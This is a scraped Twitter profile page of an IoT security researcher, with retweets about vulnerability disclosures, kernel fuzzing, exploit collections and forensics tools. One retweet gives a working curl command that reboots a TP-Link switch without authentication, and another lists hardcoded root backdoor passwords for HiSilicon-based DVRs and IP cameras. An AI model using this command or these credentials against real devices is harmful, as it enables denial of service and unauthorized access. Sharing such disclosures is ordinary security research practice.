butterflyhack

@butterflyhack

IoT Security Research, binary security, internet security

成都, 中华人民共和国
Vrijeme pridruživanja: veljača 2017.

Tweetovi

Blokirali ste korisnika/cu @butterflyhack

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @butterflyhack

  1. proslijedio/la je Tweet
    28. sij

    TP-Link TP-SG105E 1.0.0 Unauthenticated Remote Reboot # POC : curl -d "reboot_op=reboot" -X POST http://192.168.1.10/reboot.cgi Tested on: TP-SG105E V4 1.0.0 Build 20181120

    Poništi
  2. proslijedio/la je Tweet
    28. sij
    Poništi
  3. proslijedio/la je Tweet
    28. sij

    CONFIG_SECURITY_SELINUX_DISABLE being deprecated upstream in 5.6 because they had to weaken security with it being enabled: maintains the same read-onlyness for SELinux info regardless of the option. Also: b72c6bdeac96d21d67560779d5ea8bc3e3b0

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    6. velj

    CVE-2019-1388 Microsoft Windows UAC Privilege Escalation Exploit Tool : HHUPD.exe () Ref :

    Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
    Poništi
  5. proslijedio/la je Tweet
    6. velj

    Video on how to make a customized emulator. Running Netgear R6220 with customization on Qiling Framework

    Poništi
  6. proslijedio/la je Tweet
    6. velj

    Full disclosure: 0day vulnerability (backdoor) in firmware for HiSilicon-based DVRs, NVRs and IP cameras Login Password root xmhdipc root klv123 root xc3511 root 123456 root jvbzd root hi3518 [PoC]

    Poništi
  7. proslijedio/la je Tweet
    5. velj

    Analyzing WhatsApp Calls with Wireshark, radare2 and Frida by Marvin Schirrmacher 📱🔥

    Poništi
  8. proslijedio/la je Tweet
    28. sij
    Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
    Poništi
  9. proslijedio/la je Tweet
    28. sij

    [$] Some 5.5 kernel development statistics

    Poništi
  10. proslijedio/la je Tweet
    26. sij

    Windows / Linux Local Privilege Escalation Workshop (Materials included !) 🥳

    Poništi
  11. proslijedio/la je Tweet
    27. sij

    Throw in with 692 more repros for kernel bugs: Russian Roulette variation: you pick one of these, compile and run on your physical desktop/laptop; if it does not panic, your opponent picks one, and so on. (say, an out-of-bounds read may not crash)

    Poništi
  12. proslijedio/la je Tweet
    27. sij

    [PoC] MS-Windows Local Vulnerabilities Collection cve-2019-14969 cve-2019-5701 cve-2019-1378 cve-2019-12757 cve-2019-13382 cve-2019-13142 cve-2019-19248 cve-2019-0841 cve-2018-0952 cve-2019-5674 cve-2019-19363 cve-2019-1405 cve-2019-1322 CVE-2019-12758

    Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
    Poništi
  13. proslijedio/la je Tweet
    27. sij

    Linux kernel 5.5 includes kcov extension that allows to collect code coverage from background kernel threads:

    Poništi
  14. proslijedio/la je Tweet
    27. sij

    This KCOV extension by Andrey allows syzkaller to collect coverage from background kernel threads e.g. parsing incoming USB packets and unambiguously associate it with one of multiple parallel test processes running. To some degree unique for fuzzing coverage. Moar bugs coming!

    Poništi
  15. proslijedio/la je Tweet
    14. sij
    Poništi
  16. proslijedio/la je Tweet
    14. sij

    [dos] Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN

    Poništi
  17. proslijedio/la je Tweet
    14. sij
    Poništi
  18. proslijedio/la je Tweet
    14. sij

    I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. Busting Cisco's Beans :: Hardcoding Your Way to Hell PoC exploit code:

    Poništi
  19. proslijedio/la je Tweet
    30. pro 2019.

    macOS-Simple-KVM Tools to set up a quick macOS VM in QEMU, accelerated by KVM.

    Poništi
  20. proslijedio/la je Tweet
    30. pro 2019.

    Awesome Forensics Resources. Almost 300 open source forensics tools, and 600 blog posts about forensics.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·